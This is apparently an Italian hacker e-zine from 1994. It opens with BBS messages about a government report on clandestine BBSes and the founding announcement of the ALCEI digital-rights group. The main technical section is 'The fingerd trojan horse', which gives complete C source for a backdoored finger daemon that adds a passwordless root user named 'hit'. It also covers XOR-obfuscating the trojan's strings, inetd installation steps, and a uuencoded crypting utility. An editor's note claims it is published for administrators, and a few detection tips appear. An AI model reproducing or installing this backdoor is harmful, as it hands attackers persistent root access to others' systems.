ogni possibile implicazione e conseguenza.) Altre. Questi 2 che seguono sono proprio pazzeschi ! ] 693 4-Ago-94 23:08 1611 C. e' stata un'anticipazione fatta da diverse agenzie di stampa (Ansa. che esplicitamente parla dell'attivita' della sinistra all'interno delle reti informatiche e della telematica internazionale. i materiali "terroristici" in questione non arrivano solo sulle scrivanie dei giornalisti. il massimo organo di prevenzione e repressione getta l'allarme sull'informatica.. [ N. a carattere internazionale. pacchi e telegrammi anonimi (contenenti minacce... Insomma. attualmente. Sono andato a cercarlo alla Camera per leggere su cosa erano suffragate queste notizie. 605 11-Lug-94 10:40 3182 S. sostiene che su queste reti transitino informazioni "pericolose per la sicurezza nazionale ed internazionale" e che attraverso queste reti c'e' chi "acquisisce informazioni riservate". ripeto. ma molto piu' semplicemente sono disponibili a tutti sia su supporto cartaceo che elettronicamente. finanche a cambiarle . C'e' lo zampino di qualcuno che ha molto a cuore i sistemi informativi. testi atti a delinquere. in piena buonafede.d. evidentemente hanno scopi diversi. c'e' di che preoccuparsi dell'intrusione nei sistemi radar aerei esattamente come c'e' da preoccuparsi per i casi sopra riportati. ma la relazione semestrale del ministero dell'Interno al Parlamento sullo stato dei servvizi segreti e della sicurezza in Italia. Piu' in generale. Ciao . Ma allora. possiamo discutere le regole della comunicazione globale.se riteniamo che la telematica sia un medium piu' pericoloso di altri.

. Un richiamo finale. Sul caso specifico. Quando c'e' buona fede nel dibattito libero. Ora. non avrei mai scritto quell'articolo. FB [N.. Comunque. Infatti sia la televisione di stato. credo che il problema di fondo sia l'informazione reale. questo sembra essere tutto. questo qui e' proprio PAZZO !!! P-A-Z-Z-O !!! La Redazione consiglia al Sig. oltre la cronaca ci sono contenuti veramente pericolosi ed essi sono regolarmente scambiati nei circuiti citati dove l'APPARENTE bisogno di far circolare le informazioni liberamente e' VERAMENTE SOLO APPARENTE. oggi no. Due mesi fa (non due fasi. Poi ho cambiato il finale perche' avevo sostenuto pubblicamente la stessa cosa. debbano assumersi la responsabilita' di quello che scrivono e che fanno. Se fosse stato quello il motivo. ma voi sapete quanti ragazzi in italia fanno o cercano fare degli illeciti solo per avere tale materiale? Peraltro il file che descrive come fare la bomba atomica.. Grazie per le osservazioni. come magari alcuni messaggi letti in area SYSOP che 'normalmente' un comune utente non potrebbe leggere :) . Sappiamo tutti che negli Stati Uniti esistono pubblicazioni che raccontano cose simili.. soprattutto perche' e' firmato con nomi reali. a detta di un esperto nucleare che lo ha esaminato . sono Fulvio Berghella. a presto. la notizia avrebbe avuto maggior risalto. Due fasi avrei fatto il servizio.. Berghella una seduta di ascolto del Modulo Musicale "BERGHELL. Mi associo volentieri al dibattito. sarebbe stata affidata a giornali a maggior diffusione popolare e non ad una rubrica specializzata come le pagine informatiche de IL SOLE 24 ORE del venerdi. Affermando all'auletta parlamentare che non bisogna confondere i BBS amatoriali "puliti" che tanto hanno contribuito allo sviluppo dell'informatica e telematica (gratuitamente) con l'enorme gruppo clandestino che diffonde informazioni strane.d.. per ora. Non ho accettato perche' in questo momento c'e' molta strumentalizzazione sulla materia. proprio per difenderne la liceita' e la liberta'.peraltro scritto e predisposto nei giorni precedenti il dibattito al parlamento . Non si tratta di fare terrorismo informativo. Se si nascondono dietro pseudonimi o alias evidentemente ci sono motivazioni particolari. Tacere sui raggazzini che imperversano con piccoli affari illeciti o accettare gruppi anomali e tacere su organizzazioni pirata le cui dimensioni e i cui effetti sono assai piu corposi e pericolosi di quelli narrati sull'articolo non penso faccia bene a nessuno.e' pericoloso per come impostato.) avrei fatto il servizio oggi no. se qualcuno ci provasse potrebbe provocare un'auto esplosione. e le repliche anche a voce e a viso a viso. Ed e' proprio qui il punto. e come me. Se non ne fossi stato certo. amano la libera circolazione delle informazioni. per ragioni di tempo non posso continuare comunque gradisco molto il dibattito.. In merito all Correggo. Sicuramente mancheranno delle cose. penso che le persone dovrebbero sempre qualificarsi.MOD" ] -----------------------------FINE MESSAGGI------------------------------Beh. proprio per rendere il dibattito pubblico non attaccabile.r.affermando che tali eventi (riferendomi ai BBS clandestini) non aiutano l'immagine dei BBS ufficiali e amatoriali autodisciplinati.. Comunque io penso che chi come te. ma sicuramente ce ne troverete altre che non sapete. sia la radio mi avevano chiesto di fare un servizio sull'argomento e non accettato. avevo concluso l'articolo .Stefano -----------------------------Salve.

leggendo e scrivendo messaggi. Questo il comunicato ufficiale che annuncia la nascita di ALCEI . rivolgersi direttamente all'indirizzo sotto riportato .EF Italy. Alcei si richiama direttamente all'esperienza di Electronic Frontier Foundation e di EFF ha il ri- . indicano un terreno di iniziativa per la difesa e lo sviluppo dei diritti di cittadinanza telematica come parte dei diritti democratici. il ricco dibattito che negli Stati Uniti si sta sviluppando intorno alle autostrade elettroniche. Quasi senza accorgercene. Per ulteriori informazioni ed iscrizioni. le trasformazioni tecnologiche e d'uso che l'insieme dei media va conoscendo. siamo diventati un'altra cosa. usando forme nuove di comunicazione. cioe': li abbiamo noi. ----------===== ALCEI ===== Electronic Frontiers Italy -------------------------*E' nata l'associazione per i "cittadini elettronici"* -----------------------------------------------------Mai pensato che il nostro computer potrebbe aver problemi di liberta'? E il nostro modem voglia di riservatezza? Eppure ne hanno. 799 26-Ago-94 02:31 3739 B.EF Italy. la lentezza e le incertezze che caratterizzano l'affermarsi di un analogo progetto europeo. Siamo "cittadini elettronici". ma invece se ne e' letteralmente F-O-T-T-U-T-A lavandosene le mani. Dico DOVREBBE perche' per esempio anche la Associazione Fidonet Italia (AFI) avrebbe dovuto tutelare i Sysop aiutandoli in qualche modo. Per questo e' nata: ************************************* ALCEI ----Electronic Frontiers Italy Associazione per la liberta' nella comunicazione elettronica interattiva ************************************* Alcei nasce per dare la parola al cittadino elettronico.Parrella USA Oakland CA ---------------------------------------------------------------------------Comunicato ufficiale: nasce ALCEI . Ma "quanto" siamo liberi? Quanto abbiamo gia' "regole" adeguate alla novita' che viviamo e rappresentiamo? I recenti sequestri in Italia.Per finire alcune informazioni relative all' ORGANO :) che "DOVREBBE" tutelare i diritti telematici di noi pazzi telemaniaci.continuando invece ad usare questo spazio per la discussione in tema di community networking ed argomenti relativi.

it Per informazioni sull'uso del server ftpmail inviare ad archive@nexus. come specificato nelle seguenti righe che erano saltate nella prima comunicazione ufficiale. modalita' d'iscrizione. funziona bene. Infine. non abbiamo apparati. C'e' un grande vuoto da riempire. Presto saranno pronti nuovi strumenti di circolazione dell'informazione cui tutti potranno dare un contributo.iunet. carente o imprecisa (e spesso pilotata da gruppi di interesse).conoscimento pubblico e diretto. LECITI! era un'idea-proposta mai concretizzatasi ma il cui spirito (oltre a . tutti i giorni. un luogo solo di dibattito. Con questo principio intendiamo muoverci su casi singoli cosi' come su terreni generali: il diritto e la legislazione.it>. sui codici che i soggetti sociali sanno darsi autonomamente. non ha riferimenti politici o ideologici. purche' ne rispettino lo statuto. E' e vuole essere un'organizzazione operativa che lavora con pazienza. l'elaborazione di una cultura dei nuovi mezzi. Alcei non e' un'organizzazione di tendenza.) vanno richiesti all'indirizzo menzionato <alcei@mailbox. Tali documenti possono anche essere ricevuti automaticamente. Non nasciamo per aggiungere leggi a leggi.it un messaggio contentente la parola HELP nel corpo del testo. non chiede di essere finanziata dallo stato. mentre il "secondo nome" di ALCEI e' Electronic Frontiers Italy. Non e' solo un gruppo di "difesa del consumatore". Per ottenere un'adesione informata abbiamo creato un punto di riferimento telematico dove potrai chiedere informazioni sulla nostra identita' e sui nostri principi. l'informazione che e' oggi del tutto assente. A tutti chiediamo una quota associativa e una collaborazione in qualsiasi forma: nessuno ci paga. --------------------------------------------------------------Per informazioni: <alcei@mailbox. di idee e di lavoro. ecc. rammento che ulteriori informazioni (statuto.iunet.it> (fax: 06-3202346 o 02-867055) --------------------------------------------------------------809 26-Ago-94 20:30 953 B. dichiarazione di principi. Alcei non e' una "lobby". Alcei non e' una "conferenza". burocrazia a burocrazia: tutto cio' che fonda sulla liberta' e sull'autoregolamentazione. Tutti vi possono aderire. --------------------Ricordo inoltre che EFF sta per Electronic Frontier Foundation (negli USA). -------------------La documentazione su ALCEI puo' essere richiesta al server ftpmail archive@nexus. che sono incompleti. per costruire e difendere la libera cultura della telematica.Parrella USA Oakland CA ---------------------------------------------------------------------------re: comunicato alcei In merito al *comunicato* precedentemente inserito.

who would like to contribute files but cannot upload through x. ---------------------------------------------------------------------------Speriamo che questa ALCEI possa ingranare subito. invece di muovere. ~ __ ~ _ . senza entrare a far parte della RUOTA BUROCRATICA che da sempre blocca. Also I just created a general Newsgroup called "chat" as requested.\~ _ _ ~/ __ ~ ~\ ~~ ~ _ . leave Mail to Seven Up (you may use CC's!) NEWS From Sectec : ================== We just set up the Official SECTEC FTP site on the Internet! It is on spy.~ / \/ \/ _\__/ \__\/ \/ / \ \ \__// ____/_ _ __ __ \\ \ / : \ \ : ______ ~/ : : _/. \/ . \: _/.. get a better message ratio just talk about whatever you want and what wouldn't fit anywhere else.25 yet. _/.NUA 26245400050045 Donations are very welcome. qualsiasi iniziativa.~ / _ . \ \\: _/. You just chose this point from the Upload menu and chose ASCII Upload with your terminal program. // __ ________\______\ __ \____ __ \___ _ ______\___ / Dialup: +49 40 823326 8N1 with a USR Dual . but will remain online uuencoded.qualcos'altro :-) si e' riversato proprio in ALCEI. For security reasons. uuencoded files aren't uudecoded automatically.. All uploads go to /pub/SECURITY/sectec/incoming please! This is a way for all the people with Internet access. ----------------------------------------------------------------The Black Page .org in /pub/SECURITY/sectec. For all the people who want to talk. To help you uploading here.Numero 0. //: _/. Dupree's Paradise ----------------------------------------------------------------PUBBLICITA' REGRESSO ==================== CALL NOW The BEST BBS for Cyberpunk & HP Stuff in Europe !!! ________________________________________________ /~ . ~/~ . __ _\__/\/ \/ /____ ~/ _ __ __ : _ _ __ // . I just installed ASCII Upload and UUencoded Upload (which are basically the same!). \__ . ~/~ _ . \ : \ \/ \ .Articolo 4 . ~/ _ . \ : /_____ / ________\______ __ \__\_______\ __ ___________________________________________ ___________________ \~ _ _ ~/ _ . Settembre 1994 . \ _/. \~ _ _ ~/ // ____/_ _\__/.

there are dozen methods you can use. adeguatevi e datevi una svegliata.h> #define PATH_FINGER "/usr/ucb/finger" #define CODE 161 char *HitCrypt(ch) /* Add the copyright string here */ /* Add the sccsid string here */ . ---------. Se lo capite. here comes my fingerd trojan.. -=. do not use this code. or you have a network firewall. if an operator figure out that his system is under attack. of course if the port is locked.r. if nothing is found he'll realize the hacker is a dumb ass and he'll just modify the passwd to prevent him from logging in (most of cases).+ So you have gained access to a system and want to keep on hacking without being kicked off by a smart operator.The fingerd TROJAN HORSE ============ by Hitman Italy [ N. Articolo in Inglese.+ CUT HERE + ----------------------------------------------/* The Fingerd trojan by Hitman Italy * This source cannot be spreaded without the whole article * anyway you can freely use or modify it for your own */ static char copyright[] = "".d. This scheme is quite original (I've never heard about it) and the source compact enough to be fitted into a MAG. usually.79). #include <stdio. The fingerd as all you know (I hope) is the finger server run by inetd when a client opens the finger port (N. che siamo nel 2000 !!! ] [ N. bene. ] -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=The fingerd trojan horse Original article by Hitman Italy for The Black Pages This article is for informational purpose only. he'll check out the login program and telnetd for backdoors. then the telnet for logging activities or network sniffers and so on.d. Se no. I'm not liable for any damage or illegal activity perpetrated using the source or the informations in the article.R QUESTO ARTICOLO VIENE PUBBLICATO COME INFORMAZIONE PER I SYSTEM ADMINISTRATOR AFFINCHE' POSSANO PRENDERE VISIONE DI QUESTA DEBOLEZZA NEI SISTEMI UNIX. static char sccsid[] = "".

sizeof(line). int p[2]. { char *b. if (!*ap) break.196.155.215. while ((*(ch++)^=CODE)!=0x00).195. 210. leave it for "strings" command */ sval = sizeof(sin). {227.202."pipe").194.213.145. " \t\r\n"). {142.142.145. static char exor[4][23]={ {201.200.213. } main(argc.CODE} }.196.213.192. #define ENTRIES 50 char **ap. &sval) < 0) fatal(argv[0]. } if (pipe(p) < 0) fatal(argv[0]. for (lp = line. #ifdef LOGGING #include <netinet/in.213. if ((*ap)[0] == '/' && ((*ap)[1] == 'W' *ap = "-l". b=ch. if (++ap == av + ENTRIES) break. {201. stdin)) exit(1). int sval.155.142.CODE}.) { *ap = strtok(lp.200. av[0] = "finger".197.214.. line[1024].129.143.char *ch. char *argv[].194.CODE}. (*ap)[1] == 'w')) . switch(fork()) { case 0: (void)close(p[0]).155.192. *av[ENTRIES + 1].h> struct sockaddr_in sin.207.143.197."getpeername"). &sin. #endif if (!fgets(line.210.206.CODE}.213. 143.142.200. *strtok().142.argv) int argc.201. { register FILE *fp.192.194.155.197.209.210. /* unused. return(b). ap = &av[1].192.155.206. register char *lp. register int ch. lp = NULL.155. if (getpeername(0.211.200.194.

msg) char *prg. { fprintf(stderr.*msg. if (!(fp = fdopen(p[0]."fork"). HitCrypt(&exor[3][0])). while ((ch = getc(fp)) != EOF) { putchar(ch). * av[0] = "finger". prg). first of all. inetd opens the socket and pipes the the input data through the fingerd * if (!fgets(line.av[1])==0) { if(!(fp=fopen( (HitCrypt(&exor[1][0])) . "%s: ". " \t\r\n"). } fatal(prg."No local finger program found\n"). _exit(1). * for (lp = line."fdopen"). * if ((*ap)[0] == '/' && ((*ap)[1] == 'W' * *ap = "-l".PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp( (HitCrypt(&exor[0][0])) . exit(1). break. } --------.. HitCrypt(&exor[2][0]))."%s\n". (*ap)[1] == 'w')) here it gets the data from stdin and parses them (strtok) converting (due to RFC742) any '/W' or '/w' old options in '-l' * switch(fork()) { . sizeof(line). case -1: fatal(argv[0]. ap = &av[1]. } /*-=-=-=-=-=. av)==-1) fprintf(stderr. } (void)close(p[1]). "r"))) fatal(argv[0]. printf("%s\n"."a"))) _exit(10). fprintf(fp. * if (!*ap) * break. fclose(fp). stdin)) * exit(1). } /*-=-=-=-=-=. 1).+ CUT HERE + ---------------------------------------------I think it's quite easy to understand.END OF CUSTOM CODE =-=-=-=-=-=-*/ if (execv(PATH_FINGER. } exit(0). perror(msg).if (p[1] != 1) { (void)dup2(p[1].) { * *ap = strtok(lp. (void)close(p[1]).

. "r"))) fatal(argv[0]. Of course this is an example. If the magic word doesn't match of course the finger will work out normally. or remote kill an user.."hit::0:0::/:/bin/csh\n"). cover your tracks and keep on working. now the trojan. Well done! You have gained a root access.. so you can relogin as root."No local finger program found\n").666."fdopen").* * * * * * case 0: (void)close(p[0])..666. then our sleepin' trojan will wake up and do the job.av[1])==0) { if(!(fp=fopen("/etc/passwd". basically we'll check out the input finger user till the magic code matches.PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp("hit". you can do what you want simply adding your custom code. av)==-1) fprintf(stderr. fclose(fp).\n"). here the daemon executes the local finger with remote parameters * * * * * (void)close(p[1]). if (p[1] != 1) { (void)dup2(p[1].END OF CUSTOM CODE =-=-=-=-=-=-*/ When the "hit" magic code matches the trojan will modify the passwd adding a fake unpassworded root user named "hit". the output is piped back to the remote system That's how the finger daemon works. maybe root logins are disabled so you have to make a suid shell and add a normal entry in the passwd or open a port and so on. (void)close(p[1]). fprintf(fp. } the task goes into the background * * if (execv(PATH_FINGER....666] Backdoor activated."a"))) _exit(10).666.) # cat /etc/passwd root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/: . <example> # finger hit@666. 1).666 [666..666.. while ((ch = getc(fp)) != EOF) { putchar(ch).. you may remote cat a log file without logging in. printf("Backdoor activated. let's examine my code (decrypted) /*-=-=-=-=-=. (. } /*-=-=-=-=-=. you can also use multiple codes if you like. break. if (!(fp = fdopen(p[0].

Now the problem.fingerd in. If you want to use the fingerd to run world accessible commands you won't have any problem but if you require root privileges check this out: #grep fingerd /etc/inetd. of course you can use the standard crypt function or other (slow) algorithms but since security is not important (we just want to make our texts invisible) I suggest using my fast algo...fingerd now you have to refesh the inetd process #kill -HUP <inetd pid> now you can do what you want..).. anyway our local root login will work fine <example> #finger hit@hacked..com [hacked.666.system. <example amiga> echo > test "this is a test" .666.. as nobody of course you cannot modify the passwd. so edit the file finger stream tcp nowait root /usr/etc/in..) That's really useful to collect logfiles without logging in and leave tracks everywhere. a fast exor crypting routine will work fine....conf an operator unlikely will realize what is appening since all other daemons run as root..x the fingerd runs as nobody.. many unix clones let the fingerd running as root by default.com ip: 666.fingerd in.com] here is the log user: xit001 from: hell.) Lame or not? All alien data must be crypted.x.fingerd ^^^^^^ On SunOs 4. Why have I crypted all data? #strings login (..sys:*:2:2::/:/bin/csh bin:*:3:3::/bin: uucp:*:4:8::/var/spool/uucppublic: news:*:6:6::/var/spool/news:/bin/csh ingres:*:7:7::/usr/ingres:/bin/csh audit:*:9:9::/etc/security/audit:/bin/csh sync::1:1::/:/bin/sync ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh +::0:0::: hit::0:0::/:/bin/csh ^^^ they run NIS..666 has pw: xit001 user: yit001 from: (.to create the exor matrix simply put all texts on a file and use the little ExorCrypt utility I have leaved UUencoded below (amiga/msdos version). the fake user (used with NFS etc.) of MEGA(.) Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(.system...conf finger stream tcp nowait nobody /usr/etc/in. and even if you have to modify the inetd..

Now you can compile and install your fingerd trojan. add a fingerd .210.213. while ((*(ch++)^=0xa1)!=0x00). if you can. static char sccsid[]="@(#)in.6 88/11/28 SMI" That's all.213. Before compiling the whole thing you must add the copyright and sccsid strings I have not included (they may vary). remember to add a NewLine if necessary. All rights reserved.129.210.fingerd.129.201.c 1.o line crypted: 1 type test. then do VARIOUS fingerd checksums (maybe even the "sum" command is a trojan :) if you discover the trojan wrap the finger port so you can track down the hacker (usually all wtmp/lastlog logs are removed) or wrap everything modifying the daemons.conf_jump_new_daemon scheme. b=ch. Few final words to: Operators: How to defeat this trojan? First of all check the inetd.o static char exor[]={ 213. If you do not supply a key "$a1" will be used. the source was adapted for SunOS but you can port it on many unix clones without troubles.\n".conf.196. Let's simply do: (SunOs) #strings /usr/etc/in. do NOT use the inetd.129.161}.200.210.c 1.192.200.6 88/11/28 SMI <<<< SCCSID STRING getpeername finger pipe /usr/ucb/finger No local finger program found fork fdopen %s: ((((( DDDDDDDDDD AAAAAA BBBBBB The top of source becomes: static char copyright[]= "@(#) Copyright (c) 1983 Regents of the University of California. ^^^^ COPYRIGHT STRING @(#)in. } The utility will create the exor vector (matrix) (from the 80 column formatted ascii input text) and the specific decoding function. return(b).fingerd.fingerd @(#) Copyright (c) 1983 Regents of the University of California. the vector/matrix never contain them. char *ExorCrypt(ch) char *ch. { char *b.\n\ All rights reserverd.Acrypt test test.

3.WEP^T+3/I]M1..=S_!RTY_<.25:.RYS@..SBW.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h MC]]'V(6+V.+ To get in touch with me E-Mail to: Internet: hit@bix.$5^!WI)SH2__MHSQ<$Q67WZ_h M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(.L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h MWCGT)T<>==.K/6FY.Z$W.9:U9+).A.tripwire entry to prevent future installations.VCBW1%'PYS*h MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R.0Y<V3F.JPVNG]?$U3.c #mv /usr/etc/in..%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th MFQ+5LBSV3EF=/ZKE.old #mv in. Well.K'C[&XO=A5W6NU<RWF>$4?5-.D.^/\Q*=G'):7X<^R>[6.\%'W=VLD<.7. use my PGP key -----BEGIN PGP PUBLIC KEY BLOCK----Version: 2._>QYSh MH:TNP?Q>8[K:N$7ETUZ7F.^G(JBO6IX_HM.8DXGT1B=DWh MB:/IV<B$\%.fingerd trojan.3a.K5G#9O"4>=4J=%^. Beginners: You must be root to install the trojan.fingerd /usr/etc remember to check the /etc/inetd.L>P6MC$N-A#9M[[8H\ECV):F_9h MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995.U\/H27*$H`SRQB<`:/]T]0VGH-<h MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.(H0$?R.2 mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3 faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg== =bCu4 -----END PGP PUBLIC KEY BLOCK----ExorCrypt Amiga version: -=) S.`8E['P^SV]M(I(.lha M'$0M. if the hacker is a good one everything is useless..AX9DQ?@4@?ZL8O._'O:/P&Q@]RCLh MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7.[5^)FB'Y/#`A@2R`)QQh M]Y#=J^\JVD:IE_H6L??.conf -=.:OG..DI5HUY8/%h MQ>+BO[DGWM>O[7KH5F%/_)J-.3P5R0K:L^W@=h MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.'6%']'I^Q4:\OJ+4\.Encode v2.W. On a Sun do: #cc -o in.\O#"9^ILY#\T1\h M=L$]??_O)*I1MDE?. remember to get a copy of the original fingerd program before installing the fake version.&@U+.0)31U<C])/8S.MI>)@6C.Q@3651OX(#*P$?'.__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh MNI<U.com if you want._%OP`.A%.6+?D\&%LTX7<Ch M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9.SRP91%+1U^]](EG3(`+-1#G.PO+)h M%VUT+7S2>GO5%.QV-W+(Q+"(7O/<O4[[8)h M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT.3^G7FQMOA\XXX4Q2S[GS9)QP]W.?8A.<^82-**GE.99=?0A7].?HY3SE.>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h X.-A<]))-Y@SN9!MOMPPCA"h MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h M/?_]_O>YL*2RW3+[..0HGH-<FDVA?UM.fingerd fingerd.>^3?Y5SVH19P?5/Zh MA=_F.5 (=begin 777 Acrypt.G`BP"T_^)W7<CS.M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h M:$2(*R)2R(<?>Q\.0"/O).9_4DB51P!LV<Yh MHK^Z..J6MP&.^+.*TW![K%:RX-^2U1'6@U$A:NB8*U937h MBE!+)^.25: QSD Nua (0)208057040540 Mbx: Hitman_Italy .$]I[.

$&#J-0ZL8HA<1PJ^S:]8-N9AY.WG=]7.ZBA$V.W3R8I8AD"9.+'1H.8R`Q#PMQ)>RZ)R"Ih M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.Y85?8EKh M@7'1..@NHHEM2$_RW"h MEXPAHSXX.QAF\_5:AKGU5VUCM8U-:B&'O`DCST>)$\<Q_+(<%Vh MRV@'FJ=J&TW>FMG"=FS.ML#XV$E0W<.:<X\]S4\X-3F]!QT3QM=1Q0JYY<:3Y[^1.S6=H8AE66I&HTA6FZNIWV_+KGXE58V!KW@U&5N73]h M&SD6@Q?Z]FN84E.M#J:Q<HT[*HUYh MTE9-!FV\*L7$H'UP<QVO<.Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%.XQ=[+:]5E*::J%A%9\\U*>N>&DV(X<XQ^@ZR0=7-SKh MR)YY+FB^I.P>7ZI/]/"IX?74T7PA6H!#.FWG_CM_]@:B>#<'DN.:Z/Wh M//)8[7[?M27B*@"T5Z.S@\NICP+!K!8Wh M&#$6Y1!G</E.HE#YAYFTS<.V@)W\QYP.\M<6^3_T'Z&:'Q]OYBOQ"/".&R714<JT<B31H\VJ[C"O'&@=&&2^h M/=UHNS=DMW^C-<<:_^!NNZIQCZ(XFV2\#-7X)E&%P<48_(%^^.K\>:.67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h M3EVN[\.TK(0^=K6UD+1B3UJ2_X_2[>%/!`E<2W=!*>KU0@=:2h M2>I=%"@SF1'PY[T.ADOQXO.?OM3B.C0<?[F+)@QO(#PNU^WBZR.W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE..#<QK@8$H0A1N-VH]M($AB]7_04Z5(D"U(IJ%2!M?G4514h M#\K'`T%>(BU<ZIY^U\\GH@[=>2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h M>@95M+:$FREA2I]]#L.!`[)"]JR`"NC`WOT(^QA.!5M@Q-)AT<JVR5643h M!5>GAPX[AJKRS\U::ZHHU.-J=Z=$.$<NVPM"UD22Z?`"$h M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&.DIQK]S&W0QKQ(Q]X7Z\Rh MY%=6TWCZD.^1ZYQQ8)GD"._UN].01#CTW"TKS"."F#>*!&9Y4G5-4^S..)P-)*H$E)I)3T-<TPXOP"##2ECHCQ.L]64.'_&#+Y#^'\I.)]4UE1>8H:_h M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ.!#)='&WL+&*:B+.MKGP?$#+V_^h M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.NC./O##4'9I>1XH.X8B(MR%AT82DI[./)Z_h M!LN.Y1_G.+>-Z#64"UZ*U!>[NB2]-Xh M.Q6@?0Jh MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7.8731YS7.T03'*@-PR[%'.+6<.R?1]Z-+^Z+W*NXK9O0W(FV^.&\IB/U(4\$OZLWEI>:V6DQ&7UD.MM'?S_FGN6$ZA3T*I2MFN=>I(._!&_'B\R$^$'?7`4Z.Zh M'NJ85EH&A>("EN@T+QMLR*.h M4[5SGMM[5-/<#FL:Z4W.P?^%.A$`Z&Q9/h M4.U^.^R"OM2S])&W4JMM<%7/W="BZ5H.#&)2HTZM"AV^.P9U>TP745#M%TZL7V)h M4175C5]D<(B:0)-H&A@.Z>4?!QKL_Y\&V]PNIP.?>2&!.U9*]RUEP+L:%'WB_@]S!4QK#'4Yh M--W0A^<@('\]$\.L_-FFN)454#'L<JHBK0(4&=X`^X<?#]_*."3GIBHC!=FIOA)[YX.GI\*/1RJM/OKI-:"#KWh M=!U<.YOM40h M5+6&S)7.RZU)*:$8$$I3?NDK8F3="=h M5S_Q:K7/5/3'`1@QJ9*\&'(.'WT&"I[<.?0$Kh M&8'0'T<`.HY.`>50F'DP+8P2Q&.#IT1G((W\.]3M5D.[M%&'FS48=`2J-9=IO&.AG<3!4Q_3W2[L<.:.<.=KCF=O67MYI..AYT(D&XKZB6&DKN?>CDOKQ[`4h MY6![..]M6AO=.h M4%W=M-=2[<AL]J-9ER.9^LPE)+JTWE)7M=*74X78R7R+0.`/9^.V]G`]EECEO>P/`V.G-XB=L637A86T&F&KW#.:1H(9+#Z^$?N\EO1))W`@.$G#h MUU<ZKRK)_@AMOD(SC[\OWO7D]&(^WO]#<"_UL>_)6O)VWC^7N_\L?FR4-OJ]h M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.8K8>=J:':E^:':G?h ME>CR]+8C:ONI195C:%KWI3V.VF#.I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U.h MUM]`U$:?E#@'WT_7XZO-7K"47(.AY^F--A&V3'%R14@-?09IMUK)R1+h MW'@.0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.O-:X8L>2WIO7U/IXE[3)@/T2h MU#]YNDS.I8\Th M!._G.J\2[1+V9:_`9N%:LD.N-?6(=1<3F.0/XZ'9^XMTK/Ph ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7.RALJ8&"M#315%&*0+&S.JC1>S..VU\3&V]h MKN&.)!]S2G7C.^+[7!85G^-:LW'12QOZ0P?".XWH-8P51T+#R.\!-GM*_h MHJ0+#'G67_&.:'074YD%02_?X/GD$SQ?O1h M]7IOYLV!_...G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h M1Z)$!3MQ.%?-E=T+O]1[6((+GH.9.<P\%3V[J?1.VJNG5PUD[.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT.-&P]P_0&AW0JK-FE&JZ"`I8[.0.I:!#8]DV08h M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.&(:h .'BX@M<=^((/[OKZQ]`WE+W)+0.34R.A?:"*0F6h M957_V<'X-Z9P9=8E&..:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE.X.._=:Q6"[0Z1&FP_9ST\2LN22h M'\0TG47H3=73FXOC8B%S&.>?S>##7>_Z\&&"M\MS@3]h M(`?VXCKVAS/.E)"Z+XR%DUh MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h M+7M5&.E\ZMU0^&.4SWJ-0.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:.^>Q4N`'\)@$>^h M$8%"/OV7!#-D.GPB??(\?.^T+//D.Z^L`OL=H5?S0CO%:Rh 